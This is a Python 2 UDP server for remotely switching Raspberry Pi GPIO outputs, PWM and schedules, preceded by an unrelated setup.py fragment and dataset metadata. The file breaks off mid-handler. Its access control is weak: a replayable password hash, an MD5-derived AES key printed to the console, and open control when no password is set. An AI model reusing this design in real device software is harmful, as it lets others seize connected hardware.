"Operating System :: POSIX",
"Operating System :: POSIX :: BSD",
"Operating System :: POSIX :: Linux",
"Operating System :: Microsoft :: Windows",
"Programming Language :: Python",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Education",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Artificial Life",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Medical Science Apps.",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: Software Development :: Libraries",
],
package_dir={'': 'src'},
packages=find_packages(where='src'),
include_package_data=True,
install_requires=install_requirements,
tests_require=test_requirements,
extras_require={
'docs': doc_requirements,
'test': test_requirements,
'interactive': interactive_requirements,
'dev': doc_requirements + test_requirements + interactive_requirements,
},
entry_points="""
[console_scripts]
simulate=vivarium.interface.cli:simulate
""",
zip_safe=False,
)
| gpl-3.0 | -3,836,647,185,870,237,000 | 27.485149 | 89 | 0.524157 | false |
arek125/remote-GPIO-control-server | rgc-server1_1.py | 1 | 40098 | import socket
import sys
import hashlib
from datetime import datetime
import os
import signal
import glob
import sqlite3
import threading
import time
import RPi.GPIO as GPIO
HOST = ''
PORT = 8888
PASSWORD = ''
ENC_KEY = ''
exitapp = False
break_ = -1
db_path = 'rgc-server.db3'
CODE_VERSION = 2
def stringToint(string):
    try:
        ints = int(string)
    except ValueError:
        print "Error while converting String to Int"
        ints = 0 # fall back to 0 so the caller does not hit an UnboundLocalError
    return ints
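# Scheduler: polls the 'planowanie' (scheduling) table about once per second and,
# when a 'date', 'hour' or 'timer' condition matches, drives the configured output
# pins and mirrors the change into the 'stany' (states) and 'historia' (history) tables.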
def planowanie():
if exitapp == False:
rtime = 1
threading.Timer(rtime, planowanie).start()
conndb2 = sqlite3.connect(db_path, check_same_thread=False)
conndb2.isolation_level = None
cursor2 = conndb2.execute("SELECT * from planowanie p join stany s on p.Out_id = s.Id")
for row in cursor2:
if row[1] == 'date':
if row[4] == datetime.utcnow().strftime('%Y-%m-%d %H:%M'):
if row[10] != row[6]:
set=row[6]
if row[6] == 2:
set=int(not row[10])
GPIOset(row[9],set)
gpiolist = row[9].split(",")
for gpio in gpiolist:
conndb2.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=? and IN_OUT like 'out') or (GPIO_BCM like ? and Id!=? and IN_OUT like 'out');",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",row[5],"%,"+gpio+"%",row[5]))
conndb2.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? and IN_OUT like 'out' ;",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,row[5]))
conndb2.execute("UPDATE stany set Stan =?, Edit_time=? where Id=?",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),row[5]))
conndb2.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("scheduled",row[5],"ON" if ((set and not row[14]) or (not set and row[14])) else "OFF"))
conndb2.execute("DELETE from planowanie where Id=?", (row[0],))
conndb2.execute("UPDATE planowanie set Edit_time=? where Id in (SELECT Id FROM planowanie LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb2.commit()
elif row[1] == 'hour':
if row[4] == datetime.utcnow().strftime('%H:%M'):
if row[10] != row[6]:
set=row[6]
if row[6] == 2:
set=int(not row[10])
GPIOset(row[9],set)
gpiolist = row[9].split(",")
for gpio in gpiolist:
conndb2.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=? and IN_OUT like 'out') or (GPIO_BCM like ? and Id!=? and IN_OUT like 'out');",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",row[5],"%,"+gpio+"%",row[5]))
conndb2.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? and IN_OUT like 'out' ;",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,row[5]))
conndb2.execute("UPDATE stany set Stan =?, Edit_time=? where Id=?",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),row[5]))
conndb2.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("scheduled",row[5],"ON" if ((set and not row[14]) or (not set and row[14])) else "OFF"))
if row[3] == 'once':
conndb2.execute("DELETE from planowanie where Id=?", (row[0],))
conndb2.execute("UPDATE planowanie set Edit_time=? where Id in (SELECT Id FROM planowanie LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb2.commit()
elif row[1] == 'timer':
timelist = row[4].split(",")
time = int(timelist[1]) - rtime
if time <= 0:
if row[10] != row[6]:
set=row[6]
if row[6] == 2:
set=int(not row[10])
GPIOset(row[9],set)
gpiolist = row[9].split(",")
for gpio in gpiolist:
conndb2.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=? and IN_OUT like 'out') or (GPIO_BCM like ? and Id!=? and IN_OUT like 'out');",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",row[5],"%,"+gpio+"%",row[5]))
conndb2.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? and IN_OUT like 'out' ;",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,row[5]))
conndb2.execute("UPDATE stany set Stan =?, Edit_time=? where Id=?",(set,datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),row[5]))
conndb2.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("scheduled",row[5],"ON" if ((set and not row[14]) or (not set and row[14])) else "OFF"))
if row[3] == 'once':
conndb2.execute("DELETE from planowanie where Id=?", (row[0],))
conndb2.execute("UPDATE planowanie set Edit_time=? where Id in (SELECT Id FROM planowanie LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
else:
conndb2.execute("UPDATE planowanie set Dane=?, Edit_time=? where Id=?",(timelist[0]+','+timelist[0],datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),row[0]))
else:
conndb2.execute("UPDATE planowanie set Dane=?, Edit_time=? where Id=?",(str(timelist[0])+','+str(time),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),row[0]))
conndb2.commit()
conndb2.close()
def GPIOset(pinout,onoff):
pins = pinout.split(",")
onoff = stringToint(onoff)
    if onoff < 2: # 2 marks a 'mixed/unknown' state, so leave the pins untouched
for pin in pins:
pin = stringToint(pin)
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, onoff)
def GPIOstate(pin):
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(stringToint(pin), GPIO.OUT)
return GPIO.input(stringToint(pin))
def GPIOset_in(inpin):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(inpin,GPIO.IN,GPIO.PUD_UP)
def GPIOPWM(inpin,fr):
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(inpin, GPIO.OUT)
p = GPIO.PWM(inpin, fr)
return p
pwm = {k: [] for k in range(2)} # PWM objects keyed by BCM pin number (as a string)
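# Input watcher loops (one thread per configured input, started from __main__):
# inputLoop2 treats the input as a push button that toggles the bound output,
# inputLoop3 mirrors a switch directly onto the bound output, and inputLoop4 only
# records the input state. Each loop polls its pin every 50 ms, logs changes to the
# 'stany'/'historia' tables and exits when break_ equals its id or exitapp is set.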
def inputLoop2(outid,inid,inpin,Stan,reverse):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
inpin = int(inpin)
id2 = int(inid)
Stan = int(Stan)
GPIO.setup(inpin,GPIO.IN,GPIO.PUD_UP)
if Stan == 1:
stan = 6
else:
stan = 1
while exitapp == False:
if stan ==1:
if GPIO.input(inpin)==0:
stan=2
cursor1 = conndb.execute("SELECT Stan, Reverse from stany where Id=?", (outid,))
for row in cursor1:
if int(row[0])==1:
stan=3
elif stan ==2:
cursor2 = conndb.execute("SELECT GPIO_BCM, Reverse from stany where Id=?", (outid,))
for row in cursor2:
GPIOset(str(row[0]),1)
gpiolist = row[0].split(",")
for gpio in gpiolist:
conndb.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=?) or (GPIO_BCM like ? and Id!=?);",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",str(outid),"%,"+gpio+"%",str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? ;",(str(1),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where Id=?",(str(1),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(outid)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",outid,"ON" if (not reverse) else "OFF"))
conndb.execute("UPDATE stany set Stan =1,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if (not reverse) else "OFF"))
conndb.commit()
stan = 5
if GPIO.input(inpin)==1:
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if reverse else "OFF"))
conndb.commit()
stan=3
elif stan ==3:
if GPIO.input(inpin)==0:
stan=4
cursor1 = conndb.execute("SELECT Stan, Reverse from stany where Id=?", (outid,))
for row in cursor1:
if int(row[0])==0:
stan=1
elif stan ==4:
cursor2 = conndb.execute("SELECT GPIO_BCM, Reverse from stany where Id=?", (outid,))
for row in cursor2:
GPIOset(str(row[0]),0)
gpiolist = row[0].split(",")
for gpio in gpiolist:
conndb.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=?) or (GPIO_BCM like ? and Id!=?);",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",str(outid),"%,"+gpio+"%",str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? ;",(str(0),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where Id=?",(str(0),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(outid)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",outid,"ON" if reverse else "OFF"))
conndb.execute("UPDATE stany set Stan =1,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if (not reverse) else "OFF"))
conndb.commit()
stan = 6
if GPIO.input(inpin)==1:
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if reverse else "OFF"))
conndb.commit()
stan=1
elif stan ==5:
if GPIO.input(inpin)==1:
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if reverse else "OFF"))
conndb.commit()
stan=3
elif stan ==6:
if GPIO.input(inpin)==1:
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",inid,"ON" if reverse else "OFF"))
conndb.commit()
stan=1
time.sleep(0.05)
if break_ == id2:
break
def inputLoop3(id,inpin,Stan,reverse,outid):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
inpin = int(inpin)
id2 = int(id)
Stan = int(Stan)
GPIO.setup(inpin,GPIO.IN,GPIO.PUD_UP)
Oreverse = 0
if Stan == 0:
stan = 2
elif Stan == 1:
stan = 4
else:
stan = 2
while exitapp == False:
if stan ==2:
if GPIO.input(inpin)==0:
cursor2 = conndb.execute("SELECT GPIO_BCM, Reverse from stany where Id=?", (outid,))
for row in cursor2:
Oreverse=int(row[1])
GPIOset(str(row[0]),1 if not Oreverse else 0)
gpiolist = row[0].split(",")
for gpio in gpiolist:
conndb.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=?) or (GPIO_BCM like ? and Id!=?);",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",str(outid),"%,"+gpio+"%",str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? ;",(str(1 if not Oreverse else 0),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where Id=?",(str(1 if not Oreverse else 0),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(outid)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",outid,"ON" if (not reverse) else "OFF"))
conndb.execute("UPDATE stany set Stan =1,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",id,"ON" if (not reverse) else "OFF"))
conndb.commit()
stan=4
if stan ==4:
if GPIO.input(inpin)==1:
cursor2 = conndb.execute("SELECT GPIO_BCM, Reverse from stany where Id=?", (outid,))
for row in cursor2:
Oreverse=int(row[1])
GPIOset(str(row[0]),0 if not Oreverse else 1)
gpiolist = row[0].split(",")
for gpio in gpiolist:
conndb.execute("UPDATE stany set Stan =2,Edit_time=? where (GPIO_BCM like ? and Id!=?) or (GPIO_BCM like ? and Id!=?);",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),"%"+gpio+",%",str(outid),"%,"+gpio+"%",str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where GPIO_BCM =? and Id!=? ;",(str(0 if not Oreverse else 1),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),gpio,str(outid)))
conndb.execute("UPDATE stany set Stan =?,Edit_time=? where Id=?",(str(0 if not Oreverse else 1),datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(outid)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",outid,"ON" if reverse else "OFF"))
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",id,"ON" if reverse else "OFF"))
conndb.commit()
stan=2
time.sleep(0.05)
if break_ == id2:
break
def inputLoop4(id,inpin,Stan,reverse):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
inpin = int(inpin)
id2 = int(id)
Stan = int(Stan)
GPIO.setup(inpin,GPIO.IN,GPIO.PUD_UP)
if Stan == 0:
stan = 2
elif Stan == 1:
stan = 4
else:
stan = 2
while exitapp == False:
if stan ==2:
if GPIO.input(inpin)==0:
conndb.execute("UPDATE stany set Stan =1,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",id,"ON" if (not reverse) else "OFF"))
conndb.commit()
stan=4
if stan ==4:
if GPIO.input(inpin)==1:
conndb.execute("UPDATE stany set Stan =0,Edit_time=? where GPIO_BCM=? and IN_OUT like 'in'",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),str(inpin)))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",("input",id,"ON" if reverse else "OFF"))
conndb.commit()
stan=2
time.sleep(0.05)
if break_ == id2:
break
if __name__ == '__main__':
print 'Server is starting...'
print 'Please press Ctrl+C to end the program...'
conndb = sqlite3.connect(db_path, check_same_thread=False)
conndb.isolation_level = None
tableexist = conndb.execute("SELECT * FROM sqlite_master WHERE name ='stany' and type='table';")
if len(tableexist.fetchall()) == 0:
print "Creating database..."
conndb.executescript('''CREATE TABLE IF NOT EXISTS `stany` (
`Id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`GPIO_BCM` TEXT NOT NULL,
`Stan` INTEGER NOT NULL,
`Name` TEXT,
`IN_OUT` TEXT,
`Edit_time` TEXT,
`Reverse` INTEGER NOT NULL,
`Bindid` INTEGER,
`Bindtype` INTEGER);
CREATE TABLE IF NOT EXISTS `planowanie` (
`Id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`Warunek` TEXT NOT NULL,
`Podwarunek` TEXT,
`Rodzaj` TEXT NOT NULL,
`Dane` TEXT,
`Out_id` INTEGER NOT NULL,
`Stan` INTEGER NOT NULL,
`Edit_time` TEXT );
CREATE TABLE IF NOT EXISTS `pwm` (
`Id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`GPIO_BCM` TEXT NOT NULL,
`FR` NUMERIC NOT NULL,
`DC` INTEGER NOT NULL,
`SS` INTEGER NOT NULL,
`Name` TEXT NOT NULL,
`Reverse` INTEGER NOT NULL,
`Edit_time` TEXT);
CREATE TABLE IF NOT EXISTS `historia` (
`Id` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
`Czas` TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
`Typ` TEXT,
`Id_IO` INTEGER,
`Id_Pwm` INTEGER,
`Stan` TEXT NOT NULL);''')
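        # Schema overview: 'stany' stores the configured inputs/outputs and their
        # current states, 'planowanie' the scheduled actions, 'pwm' the PWM channels
        # and 'historia' an audit log of every state change.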
print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')
try :
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print 'Socket created'
except socket.error, msg :
print 'Failed to create socket. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
i = 0
for arg in sys.argv:
if arg == '-port':
try:
PORT = int(sys.argv[i+1])
except ValueError:
print "Wrong port argument"
elif arg == '-address':
HOST = sys.argv[i+1]
elif arg == '-password':
PASSWORD = hashlib.sha256(sys.argv[i+1].encode()).hexdigest()
ENC_KEY = hashlib.md5(sys.argv[i+1].encode()).hexdigest()
print ENC_KEY
import base64
from Crypto import Random
from Crypto.Cipher import AES
def encrypt(key, message):
try:
bs = 16
message = message + (bs - len(message) % bs) * chr(bs - len(message) % bs)
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_CBC, iv)
s = base64.b64encode(iv + cipher.encrypt(message)).decode('utf-8')
except:
s = "error"
return s
def decrypt(key, enc_message):
try:
enc_message = base64.b64decode(enc_message)
iv = enc_message[:AES.block_size]
cipher = AES.new(key, AES.MODE_CBC, iv)
s = cipher.decrypt(enc_message[AES.block_size:])
s = s[:-ord(s[len(s)-1:])].decode('utf-8')
except:
s = "error"
return s
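            # Wire format implemented above: each command is padded (PKCS#7 style),
            # AES-CBC encrypted with MD5(password) as the key and a random IV
            # prepended to the ciphertext, then base64-encoded for the UDP payload.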
i = i+1
try:
s.bind((HOST, PORT))
except socket.error , msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete ' + str(s.getsockname()) + PASSWORD
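    # Restore the saved output states at startup (outputs bound to an input are reset
    # to their reverse-aware 'off' level), then re-create the PWM channels from the db.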
cursor1 = conndb.execute("SELECT * from stany where IN_OUT like 'out' order by Edit_time ASC")
for row in cursor1:
print 'OUTPUT: GPIO='+str(row[1])+' STATE='+str(row[2])
GPIOset(row[1],row[2]) if not row[8] else GPIOset(row[1],0 if not row[6] else 1)
cursor1 = conndb.execute("SELECT * from pwm")
for row in cursor1:
print 'OUTPUT PWM: GPIO='+str(row[1])+' S/S='+str(row[4])+' FR='+str(row[2])+' DC='+str(row[3])
pwmpins = row[1].split(",")
for pin in pwmpins:
pwm[pin] = GPIOPWM(int(pin),float(row[2]))
if row[4] == 1:
pwm[pin].start(int(row[3]))
try:
pid = planowanie()
cursor1 = conndb.execute("SELECT * from stany where IN_OUT like 'in'")
for row in cursor1:
print 'INPUT: GPIO='+str(row[1])+' STATE='+str(row[2])
if row[8] == 1:
threading.Thread(target=inputLoop2, args=(row[7],row[0],row[1],row[2],row[6])).start()
elif row[8] == 2:
threading.Thread(target=inputLoop3, args=(row[0],row[1],row[2],row[6],row[7])).start()
else:
threading.Thread(target=inputLoop4, args=(row[0],row[1],row[2],row[6])).start()
while 1:
d = s.recvfrom(1024)
data = d[0].strip()
addr = d[1]
datalist = data.split(";")
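            # Each datagram is a ';'-separated message: with a password configured,
            # field 0 must hold sha256(password) and field 1 the AES-encrypted command;
            # without a password the fields are used as-is (field 1 is the command name).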
passwalidation = False
if PASSWORD == '':
passwalidation = True
else:
if datalist[0] == PASSWORD:
temp = decrypt(ENC_KEY,datalist[1])
if temp == 'error':
passwalidation = False
print 'Decrytion error'
else:
datalist = ("0;"+temp).split(";")
passwalidation = True
else:
passwalidation = False
if passwalidation == True:
if datalist[1] == 'version_check':
reply = 'true;version_check;'+str(CODE_VERSION)+';'
elif datalist[1] == 'GPIO_OEtime':
cursor8 = conndb.execute("SELECT Max(Edit_time) FROM stany where IN_OUT like 'out'")
for row in cursor8:
reply = 'true;GPIO_OEtime;'+str(row[0])+';'
elif datalist[1] == 'GPIO_Olist':
cursor9 = conndb.execute("SELECT * from stany where IN_OUT like 'out'")
reply = 'true;GPIO_Olist;'
for row in cursor9:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[6])+';'+str(row[8])+';'
elif datalist[1] == 'Add_GPIO_out':
idio = conndb.execute("INSERT INTO stany VALUES (null,?,2,?,'out',?,?,null,?)",(datalist[2],datalist[3],datalist[4],datalist[5],datalist[6])).lastrowid
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[7],str(idio),"ADDED"))
conndb.commit()
reply= 'true;Add_GPIO_out;'
elif datalist[1] == 'Edit_GPIO_out':
conndb.execute("UPDATE stany set Stan=2, GPIO_BCM=?,Name=?, Edit_time=?, reverse=?, Bindtype=? where Id=?",(datalist[3],datalist[4],datalist[5],datalist[6],datalist[8],datalist[2]))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[9],datalist[2],"EDITED"))
conndb.commit()
pwmpins = datalist[3].split(',')
pwmpins2 = datalist[7].split(',')
for pin2 in pwmpins2:
if pin2 not in pwmpins:
GPIO.cleanup(int(pin2))
reply= 'true;Edit_GPIO_out;'
elif datalist[1] == 'Delete_GPIO_out':
break_ = int(datalist[2])
conndb.execute("DELETE from stany where Id=?",(datalist[2],))
conndb.execute("UPDATE stany set Edit_time=? where Id in (SELECT Id FROM stany LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb.execute("DELETE from historia where Id_IO=?",(datalist[2],))
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[5],datalist[2],datalist[4]+" DELETED"))
r1 = conndb.execute("DELETE from planowanie where Out_id=?",(datalist[2],)).rowcount
if r1 > 0:
conndb.execute("UPDATE planowanie set Edit_time=? where Id in (SELECT Id FROM planowanie LIMIT 1)",(datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),))
conndb.commit()
pwmpins = datalist[3].split(",")
for pin in pwmpins:
GPIO.cleanup(int(pin))
reply= 'true;Delete_GPIO_out;'
elif datalist[1] == 'GPIO_IEtime':
cursor8 = conndb.execute("SELECT Max(Edit_time) FROM stany where IN_OUT like 'in'")
for row in cursor8:
reply = 'true;GPIO_IEtime;'+str(row[0])+';'
elif datalist[1] == 'GPIO_Ilist':
cursor13 = conndb.execute("SELECT * from stany where IN_OUT like 'in'")
reply = 'true;GPIO_Ilist;'
for row in cursor13:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[6])+';'+str(row[7])+';'+str(row[8])+';'
elif datalist[1] == 'Add_GPIO_in':
id = conndb.execute("INSERT INTO stany VALUES (null,?,0,?,'in',?,?,?,?)",(datalist[2],datalist[3],datalist[4],datalist[5],datalist[6],datalist[7])).lastrowid
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[8],str(id),"ADDED"))
conndb.commit()
if datalist[7] == '1':
threading.Thread(target=inputLoop2, args=(datalist[6],id,datalist[2],'0',datalist[5])).start()
elif datalist[7] == '2':
threading.Thread(target=inputLoop3, args=(id,datalist[2],'0',datalist[5],datalist[6])).start()
else:
threading.Thread(target=inputLoop4, args=(id,datalist[2],'0',datalist[5])).start()
reply= 'true;Add_GPIO_in;'
elif datalist[1] == 'Edit_GPIO_in':
break_ = int(datalist[2])
conndb.execute("DELETE from stany where Id=?",(datalist[2],))
conndb.execute("DELETE from historia where Id_IO=?",(datalist[2],))
id = conndb.execute("INSERT INTO stany VALUES (null,?,0,?,'in',?,?,?,?)",(datalist[3],datalist[4],datalist[5],datalist[6],datalist[7],datalist[8])).lastrowid
conndb.execute("INSERT INTO historia(Typ, Id_IO, Stan) VALUES(?,?,?)",(datalist[10],str(id),"EDITED"))
conndb.commit()
if datalist[3] != datalist[9]:
GPIO.cleanup(int(datalist[9]))
if datalist[8] == '1':
threading.Thread(target=inputLoop2, args=(datalist[7],id,datalist[3],'0',datalist[6])).start()
elif datalist[8] == '2':
threading.Thread(target=inputLoop3, args=(id,datalist[3],'0',datalist[6],datalist[7])).start()
else:
threading.Thread(target=inputLoop4, args=(id,datalist[3],'0',datalist[6])).start()
reply= 'true;Edit_GPIO_in;'
elif datalist[1] == 'GPIO_Oname':
cursor12 = conndb.execute("SELECT Id,Name,GPIO_BCM,Reverse from stany where IN_OUT like 'out'")
reply = 'true;GPIO_Oname;'
for row in cursor12:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'
elif datalist[1] == 'GPIO_PEtime':
cursor13 = conndb.execute("SELECT Max(Edit_time) FROM pwm")
for row in cursor13:
reply = 'true;GPIO_PEtime;'+str(row[0])+';'
elif datalist[1] == 'GPIO_Plist':
cursor14 = conndb.execute("SELECT * from pwm")
reply = 'true;GPIO_Plist;'
for row in cursor14:
reply += str(row[0])+';'+str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[4])+';'+str(row[5])+';'+str(row[6])+';'
elif datalist[1] == 'GPIO_PDC':
pwmpins = datalist[3].split(",")
for pin in pwmpins:
pwm[pin].ChangeDutyCycle(int(datalist[4]))
reply = 'true;GPIO_PDC;'+datalist[4]+';'
elif datalist[1] == 'GPIO_PDCu':
conndb.execute("UPDATE pwm set DC=?,Edit_time=? where Id=?",(datalist[4],datalist[5],datalist[2]))
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[6],datalist[2],"DC="+datalist[4]+"%"))
conndb.commit()
reply = 'true;GPIO_PDCu;'+datalist[4]+';'+datalist[5]+';'
elif datalist[1] == 'GPIO_PFRDC':
pwmpins = datalist[3].split(",")
for pin in pwmpins:
pwm[pin].ChangeDutyCycle(int(datalist[5]))
pwm[pin].ChangeFrequency(float(datalist[4]))
conndb.execute("UPDATE pwm set FR=?,DC=?,Edit_time=? where Id=?",(datalist[4],datalist[5],datalist[6],datalist[2]))
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[7],datalist[2],"DC="+datalist[5]+"%,FR="+datalist[4]+"Hz"))
conndb.commit()
reply = 'true;GPIO_PFRDC;'+datalist[4]+';'+datalist[6]+';'+datalist[5]+';'
elif datalist[1] == 'GPIO_PSS':
pwmpins = datalist[3].split(",")
for pin in pwmpins:
if datalist[6] == '1':
pwm[pin].start(int(datalist[4]))
pwm[pin].ChangeFrequency(float(datalist[7]))
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[8],datalist[2],"ON:DC="+datalist[4]+"%,FR="+datalist[7]+"Hz"))
elif datalist[6] == '0':
pwm[pin].stop()
conndb.execute("INSERT INTO historia(Typ, Id_Pwm, Stan) VALUES(?,?,?)",(datalist[8],datalist[2],"OFF"))
conndb.execute("UPDATE pwm set DC=?,Edit_time=?,SS=? where Id=?",(datalist[4],datalist[5],datalist[6],datalist[2]))
conndb.commit()
